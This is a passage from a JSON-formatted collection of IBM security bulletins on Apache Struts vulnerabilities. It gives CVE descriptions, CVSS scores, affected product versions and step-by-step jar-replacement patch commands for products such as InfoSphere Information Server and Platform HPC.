\nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114188_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114188>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [_CVE-2016-0785_](<https://vulners.com/cve/CVE-2016-0785>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double OGNL evaluation of attribute values. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111513_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111513>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n \n \n**CVEID:** [_CVE-2016-2162_](<https://vulners.com/cve/CVE-2016-2162>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the I18NInterceptor. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. 
\nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111515_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111515>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-4003_](<https://vulners.com/cve/CVE-2016-4003>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111514_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-3081_](<https://vulners.com/cve/CVE-2016-3081>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base Score: 5.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112528_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID:** [_CVE-2016-3082_](<https://vulners.com/cve/CVE-2016-3082>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112527_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID:** [_CVE-2016-3087_](<https://vulners.com/cve/CVE-2016-3087>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability using the REST Plugin to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113685_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113685>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-3093_](<https://vulners.com/cve/CVE-2016-3093>) \n**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. 
\nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. 
\nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L) \n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5 \nIBM InfoSphere Information Governance Catalog: versions 11.3, and 11.5 \nIBM InfoSphere Metadata Workbench: versions 8.5, 8.7, and 9.1\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Information Server, Information Governance Catalog| 11.5| JR56313| \\--Apply IBM InfoSphere Information Server version [_11.5.0.1_](<http://www-01.ibm.com/support/docview.wss?uid=swg24041893>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11501_isf_ru3_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Governance[_ Rollup patch 5_](<http://www-01.ibm.com/support/docview.wss?uid=swg24042914>) \nInfoSphere Information Server, Information Governance Catalog| 11.3| JR56313| \\--Apply IBM InfoSphere Information Server version [_11.3.1.2 _](<http://www-01.ibm.com/support/docview.wss?uid=swg24040138>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_isf_ru5_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Governance Catalog [_Security 
patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_IGC_ru23_server_client_multi>) \nInfoSphere Information Server, Metadata Workbench| 9.1| JR56313| \\--Apply IBM InfoSphere Information Server version [_9.1.2.0_](<http://www-01.ibm.com/support/docview.wss?uid=swg24035470>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_isf_ru11_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Server Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_JR56302_MWB_server_engine_client_multi>) \nInfoSphere Information Server, Metadata Workbench| 8.7| JR56313| \\--Apply IBM InfoSphere Information Server version [_8.7 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_isf_ru4_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Server Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_JR56302_MWB_server_engine_client_multi>) \n \nNote: \n1\\. Some fixes require installing both a fix pack and a subsequent patch. While the fix pack must be installed first, any additional patches required may be installed in any order. \n2\\. 
For IBM InfoSphere Information Server version 8.5, IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:42:18", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Struts affect IBM InfoSphere Information Server", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2162", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3087", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4430", "CVE-2016-4431", "CVE-2016-4433", "CVE-2016-4436", "CVE-2016-4438", "CVE-2016-4465"], "modified": "2018-06-16T13:42:18", "id": "F7297DEE78789012F7802C00A7D437B06424929237D39542808A1D9905687922", "href": "https://www.ibm.com/support/pages/node/549551", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:51:06", "description": "## Summary\n\nOpen Source Apache Struts Vulnerabilities were addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced 
Edition, Platform HPC, and Spectrum Cluster Foundation.\n\n## Vulnerability Details\n\n**CVE-ID**: CVE-2017-12611 \n**Description**: Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in a Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/131603_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1 \nSpectrum Cluster Foundation 4.2.2\n\n## Remediation/Fixes\n\nIBM recommends that you review your entire environment to identify vulnerable releases of open source Apache Struts and take appropriate mitigation and remediation actions. \n\n**Platform Cluster Manager 4.2.1 & Platform HPC 4.2.1 & Spectrum Cluster Foundation 4.2.2**\n\n1\\. Download the struts-2.3.34-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.34/_](<http://archive.apache.org/dist/struts/2.3.34/>)\n\n2\\. Copy the struts-2.3.34-lib.zip package to the management node.\n\n3\\. 
Extract the struts-2.3.34-lib.zip package on the management node.\n\n# mkdir -p /root/backup\n\n \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/ognl-* /root/backup \n \n# unzip struts-2.3.34-lib.zip \n# cd struts-2.3.34/lib \n# cp xwork-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp ognl-3.0.21.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-json-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n\n\n4\\. Restart Platform HPC services. 
If high availability is enabled, run the following commands on the active management node: \n\n# pcmhatool failmode -m manual \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n# pcmhatool failmode -m auto\n\n \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n\n**Platform Cluster Manager 4.2.0 4.2.0.x & Platform HPC 4.2.0 4.2.0.x**\n\n1\\. Download the struts-2.3.34-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.34/_](<http://archive.apache.org/dist/struts/2.3.34/>)\n\n2\\. Copy the struts-2.3.34-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.34-lib.zip package on the management node.\n\n4\\. # mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup\n\n \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/ognl-* /root/backup \n \n# unzip struts-2.3.34-lib.zip \n# cd struts-2.3.34/lib \n# cp xwork-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp ognl-3.0.21.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-json-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.34.jar 
/opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n\n5\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node:\n\n \n# pcmhatool failmode -m manual \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n# pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n\n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x**\n\n1\\. Download the struts-2.3.34-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.34/_](<http://archive.apache.org/dist/struts/2.3.34/>)\n\n2\\. Copy the struts-2.3.34-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.34-lib.zip package on the management node\n\n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup\n\n \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/ognl-* /root/backup \n \n# unzip struts-2.3.34-lib.zip \n# cd struts-2.3.34/lib/ \n# cp xwork-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-json-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# 
cp struts2-spring-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp ognl-3.0.21.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n\n4\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node:\n\n# pcmhatool failmode -m manual \n# pmcadmin stop \n# pmcadmin start \n# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the management node:\n\n# pmcadmin stop \n# pmcadmin start\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-24T02:07:21", "type": "ibm", "title": "Security Bulletin: Open Source Apache Struts Vulnerabilities affect IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2018-06-24T02:07:21", "id": 
"F71D5D04C2F0092342927E605713DFE45269C2A24CFC53DC412619417A4461D1", "href": "https://www.ibm.com/support/pages/node/705943", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:52:40", "description": "## Summary\n\nAn Apache Struts vulnerability was addressed by IBM Social Media Analytics 1.3.0 IF18. \nAn upgrade to Apache Struts version 2.3.28.1 was performed.\n\n## Vulnerability Details\n\n**CVE-ID:** [CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>)\n\n**Description:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.\n\nCVSS Base Score: 6.1\n\nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111514_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for more information\n\nCVSS Environmental Score*: Undefined\n\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n[IBM Social Media Analytics 1.3.0 IF18](<http://www.ibm.com/support/docview.wss?uid=swg24043000>) \n\n\nFor users of IBM Social Media Analytics 1.2, IBM recommends upgrading to IBM Social Media Analytics 1.3. \n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Struts and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone known. 
Apply Social Media Analytics 1.3.0 IF18 interim fix.\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-06-15T22:47:17", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2016-4003)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4003"], "modified": "2018-06-15T22:47:17", "id": "9655812C157678ED2990414C144E3BE29B141DF944F935E84247C6809BFAF59A", "href": "https://www.ibm.com/support/pages/node/285469", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-07-30T09:48:02", "description": "## Summary\n\nApache Struts could potentially allow a remote attacker to bypass security restrictions, caused by predictable tokens. \n\n## Vulnerability Details\n\n**CVEID: **[**_CVE-2014-7809_**](<https://vulners.com/cve/CVE-2014-7809>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. 
\n \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/98963_](<http://xforce.iss.net/xforce/xfdb/98963>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N\n\n## Affected Products and Versions\n\n**IBM FlashSystem 840:** \nMachine Type 9840, model -AE1 (all supported releases) \nMachine Type 9843, model -AE1 (all supported releases) \n \n**IBM FlashSystem V840:** \nMachine Type 9846, model -AE1 (all supported releases) \nMachine Type 9848, model -AE1 (all supported releases) \n \nThe Service Assist GUI is the only component in these products that uses the Apache Struts library. \n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**840 MTMs:** \n9840-AE1 & \n9843-AE1 \n \n**V840 MTMs:** 9846-AE1 & \n9848-AE1| _A code fix is now available, the VRMF of this code level is 1.1.3.6 (or later)_| _N/A_| _No workarounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n**Note:** \nV840 customers must upgrade the code of both the -AE1 and -ACx (whether -AC0 or -AC1) nodes to address this vulnerability. A customer reading this to fix one model type (e.g. \u2013AE1) should look for the corresponding security bulletin which describes how to fix the other model type (e.g. perhaps \u2013AC0) in the customer's V840. 
\n \n[_Link to FlashSystem 840 fixes_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash+high+availability+systems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>) \n \n[_Link to FlashSystem V840 fixes_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash+high+availability+systems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: IBM FlashSystem 840 and IBM FlashSystem V840, -AE1 models nodes are affected by vulnerabilities in Apache\u2019s Struts library (CVE-2014-7809)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2023-02-18T01:45:50", "id": "0FEF8414C4D35E1CF57FAA80A4963C99470B852C3455B106AAEEAFC9EF57A118", "href": "https://www.ibm.com/support/pages/node/690239", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T01:34:36", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V9000 is susceptible. An exploit of this vulnerability could allow a remote attacker to gain unauthorized access to the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-5209_](<https://vulners.com/cve/CVE-2015-5209>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. 
An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base Score: 9.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106695_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem V9000 including machine type and models (MTMs) for all available code levels._ MTMs affected include 9846-AE2, 9848-AE2, 9846-AC2, and 9848-AC2\n\n## Remediation/Fixes\n\n_V9000 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**V9000 MTMs:** \n9846-AE2, \n9848-AE2, \n9846-AC2 & \n9848-AC2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream. These code levels work for both the storage enclosure nodes (-AEx) and the control nodes (-ACx)_ \n \n__Code Fix VRMF .__ \n_7.6 stream: 7.6.0.4 (or later)_ \n_7.5 stream: 7.5.1.3 (or later)_ \n_7.4 stream: 7.4.1.4 (or later)_| _ __N/A_| _No workarounds or mitigations, other than applying this code fix, are known for this vulnerability_ \n \n \n[**_FlashSystem V9000 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 